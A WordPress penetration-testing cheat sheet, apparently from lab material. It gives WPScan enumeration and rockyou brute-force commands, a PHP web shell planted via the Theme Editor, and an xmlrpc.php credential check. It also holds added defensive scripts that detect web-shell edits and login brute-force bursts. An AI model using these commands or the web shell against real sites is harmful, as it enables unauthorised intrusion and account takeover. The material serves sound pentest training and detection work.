# Wordpress Pentesting

## WordPress Structure

```
.
├── index.php
├── license.txt
├── readme.html
├── wp-activate.php
├── wp-admin
├── wp-blog-header.php
├── wp-comments-post.php
├── wp-config.php
├── wp-config-sample.php
├── wp-content
├── wp-cron.php
├── wp-includes
├── wp-links-opml.php
├── wp-load.php
├── wp-login.php
├── wp-mail.php
├── wp-settings.php
├── wp-signup.php
├── wp-trackback.php
└── xmlrpc.php
```

## WordPress User Roles

***

There are five types of users in a standard WordPress installation.

| Role          | Description                                                                                                                                            |
| ------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ |
| Administrator | This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code. |
| Editor        | An editor can publish and manage posts, including the posts of other users.                                                                            |
| Author        | Authors can publish and manage their own posts.                                                                                                        |
| Contributor   | These users can write and manage their own posts but cannot publish them.                                                                              |
| Subscriber    | These are normal users who can browse posts and edit their profiles.                                                                                   |

## WPScan

### Basic Scan

```bash
wpscan --url http://127.0.0.1
```

### Enumerate Plugins using WPScan

```bash
wpscan --url http://94.237.49.182:58555/ --enumerate ap
```

### Enumerate Users using WPScan

```bash
wpscan --url http://94.237.49.182:58555/ --enumerate u
```

### Aggressive Plugin Detection using WPScan

```bash
wpscan --url http://blog.inlanefreight.local -e ap --no-banner --plugins-detection aggressive --plugins-version-detection aggressive --max-threads 60
```

### All-in-One WPScan Command

```bash
wpscan --url target.com --disable-tls-checks --api-token <api-token> -e at,ap,u --plugins-detection aggressive --force
```

### Basic WPScan Brute-Force Attack

```bash
wpscan --url http://example.com --passwords /usr/share/wordlists/rockyou.txt
```

### Brute-Force Attack using WPScan

WPScan can also brute force login credentials. In this case the scan report returned three users registered on the website: `admin`, `roger`, and `david`. The tool supports two kinds of login brute force attack, `xmlrpc` and `wp-login`. The `wp-login` method attempts logins against the normal WordPress login page, while the `xmlrpc` method uses the WordPress API to make login attempts through `/xmlrpc.php`. The `xmlrpc` method is preferred as it is faster.

```bash
wpscan --password-attack xmlrpc -t 20 -U admin,david -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com
```

## RCE using ThemeEditor

Log in to the WordPress dashboard as an Administrator, then open the Theme Editor page.

Edit the theme's **404 template** (`404.php`) and add a reverse shell to it.

Alternatively, add the following web shell instead:

```php
<?php
system($_GET['cmd']);
?>
```

Save the file and request the URL below to reach it and execute the command:

```
http://<target>/wp-content/themes/twentyseventeen/404.php
```

and we have successful RCE.
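
The edit above changes a theme file on disk, which a baseline of file hashes will catch. The following Python script is an added example, not part of the original notes: it compares a theme directory against a trusted hash baseline and greps added or changed PHP files for shell-execution calls fed from request input; the theme files and paths are constructed in a temporary directory.

```python
import hashlib, os, re, tempfile

# Shell-execution functions fed straight from request input: the shape of a dropped PHP web shell.
SHELL_RE = re.compile(
    r"\b(system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\([^;]*\$_(GET|POST|REQUEST|COOKIE)",
    re.I,
)

def hash_tree(root):
    """Return {relative_path: sha256_hex} for every .php file under root."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def audit_theme(root, baseline):
    """Diff the tree against a trusted baseline and grep added or changed files for shell patterns."""
    current = hash_tree(root)
    findings = {"added": [], "removed": [], "modified": [], "webshell_like": []}
    for rel in sorted(set(current) | set(baseline)):
        if rel not in baseline:
            findings["added"].append(rel)
        elif rel not in current:
            findings["removed"].append(rel)
        elif current[rel] != baseline[rel]:
            findings["modified"].append(rel)
    for rel in findings["added"] + findings["modified"]:
        with open(os.path.join(root, rel), errors="ignore") as fh:
            if SHELL_RE.search(fh.read()):
                findings["webshell_like"].append(rel)
    return findings

def demo():
    """Constructed scenario: baseline a clean theme, then 404.php gains the web shell from above."""
    root = tempfile.mkdtemp()
    clean = "<?php get_header(); ?>\n<h1>Page not found</h1>\n<?php get_footer(); ?>\n"
    for name in ("404.php", "index.php", "functions.php"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write(clean)
    baseline = hash_tree(root)  # captured while the theme is known-good
    with open(os.path.join(root, "404.php"), "a") as fh:
        fh.write("<?php system($_GET['cmd']); ?>\n")  # the Theme Editor edit described above
    return audit_theme(root, baseline)

if __name__ == "__main__":
    print(demo())
```

The preventive control is `define('DISALLOW_FILE_EDIT', true);` in `wp-config.php`, which removes the theme and plugin file editors from the dashboard.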

## XMLRPC.php

It is important to note that `xmlrpc.php` being enabled on a WordPress instance is not a vulnerability. Depending on the methods allowed, `xmlrpc.php` can facilitate some enumeration and exploitation activities, though.

If we have a username and password for the admin user, we can verify them against `xmlrpc.php` by calling the `wp.getUsersBlogs` method:

```bash
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php
```
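
Both the `xmlrpc` password attack from the WPScan section and credential checks like the `curl` call above show up as a burst of POST requests to `xmlrpc.php` or `wp-login.php` in the web server access log. The script below is an added example, not part of the original notes: it walks constructed combined-format log lines and flags any source exceeding a chosen number of login POSTs inside a sliding window (the threshold and window are assumed values).

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined log format prefix: ip ident user [time] "METHOD path HTTP/x" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LOGIN_PATHS = ("/xmlrpc.php", "/wp-login.php")

def parse_login_post(line):
    """Return (ip, timestamp, path) for a POST to a login endpoint, else None."""
    m = LOG_RE.match(line)
    if not m or m.group("method") != "POST":
        return None
    path = m.group("path").split("?", 1)[0]
    if not path.endswith(LOGIN_PATHS):
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, path

def find_bruteforce(lines, threshold=10, window_s=60):
    """Return {ip: peak_count} for IPs with >= threshold login POSTs in any window.
    Failed xmlrpc.php logins come back as HTTP 200 plus an XML fault, so the
    status code is no signal; request volume per source is."""
    recent = defaultdict(deque)  # per-IP timestamps inside the sliding window
    flagged = {}
    for line in lines:  # lines are assumed to be in time order
        hit = parse_login_post(line)
        if hit is None:
            continue
        ip, ts, _ = hit
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged

# Constructed sample: one source hammering xmlrpc.php, one ordinary login.
SAMPLE_LOG = [
    f'203.0.113.5 - - [10/Mar/2024:12:00:{i:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "-"'
    for i in range(15)
] + [
    '198.51.100.7 - - [10/Mar/2024:12:00:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "-"',
    '198.51.100.7 - - [10/Mar/2024:12:00:06 +0000] "GET /wp-admin/ HTTP/1.1" 200 5120 "-" "-"',
]
```

Rate limiting or blocking on the same two endpoints, or disabling XML-RPC where nothing needs it, addresses the attack itself; the log check catches what gets through.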


